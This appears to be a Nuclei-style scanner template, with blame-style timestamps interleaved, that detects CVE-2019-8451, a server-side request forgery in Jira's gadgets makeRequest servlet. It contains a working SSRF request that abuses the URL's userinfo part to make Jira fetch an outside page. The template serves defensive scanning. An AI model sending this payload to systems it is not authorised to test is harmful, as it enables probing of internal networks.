2021-01-02 04:59:06 +00:00
id : CVE-2019-8451
2020-07-06 14:52:34 +00:00
info :
name : JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
2021-02-05 19:44:41 +00:00
author : TechbrunchFR
2020-07-06 14:52:34 +00:00
severity : medium
2021-03-30 12:10:17 +00:00
description : The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
reference : |
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
2021-02-05 19:44:41 +00:00
tags : cve,cve2019,atlassian,jira,ssrf
2020-07-06 14:52:34 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
headers :
X-Atlassian-token : no -check
matchers :
- type : word
name : ssrf-response-body
words :
- '<p>This domain is for use in illustrative examples in documents.'
part : body